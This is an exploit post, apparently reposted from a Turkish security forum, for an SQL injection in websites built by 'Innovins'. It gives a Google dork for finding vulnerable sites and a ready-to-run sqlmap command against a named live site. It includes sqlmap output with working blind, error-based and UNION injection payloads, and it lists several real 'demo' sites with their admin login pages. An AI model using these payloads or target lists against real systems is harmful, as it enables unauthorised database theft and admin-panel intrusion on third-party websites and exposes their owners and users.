Innovins Sql İnjection Vulnerability



[CODE]#################################################################################
# Exploit Title: Innovins Sql İnjection Vulnerability
# Author : Sipahiler & TURKZ.org
# Google Dork : intext:"Developed by Innovins" & inurl:id=
# Tested on : Kali Linux 2017.1 Chrome, Firefox
# Data : 2017-09-05
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/     
#################################################################################
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target
[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --random-agent --technique=BEUS  --threads=10 --no-cast  --tamper=space2comment,randomcase --timeout=10 --level=3 --risk=3  --batch  --dbs -u "http://www.charlstondsouza.com/event1.php?id=11"

Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=11' RLIKE (SELECT (CASE WHEN (3513=3513) THEN 11 ELSE 0x28 END)) AND 'vQij'='vQij

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=11' AND (SELECT 1488 FROM(SELECT COUNT(*),CONCAT(0x716a6b6271,(SELECT (ELT(1488=1488,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'QJBd'='QJBd

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: id=-2119' UNION ALL SELECT NULL,CONCAT(0x716a6b6271,0x415064474443646e726c5968517a4f4e7561676556576553695a576473454e524d47797365504452,0x7171706a71),NULL,NULL,NULL,NULL#

Demo :
http://www.charlstondsouza.com/event1.php?id=11
http://www.pehl.co.in/page.php?id=17
http://www.sunrich.co.in/article.php?id=2

http://www.charlstondsouza.com/sn-panel/admin-login.php
http://pehl.co.in/admin/login.php
http://www.sunrich.co.in/admin

Note: Look İn The Source Code To Find The Admin Panel
References:
http://www.turkz.org/Forum/konu/innovins-sql-injection-vulnerability.3401/
https://cxsecurity.com/issue/WLB-2017090029

[/CODE]

Share
Tepkiler: 
Uyari: Telif hakkı tamamen kaynağa aittir. Bu konuyla ilgili bir sorun varsa, burada bizimle iletişime geçebilirsiniz. Contact.

EN SON MAKALELER

Yorum Gönder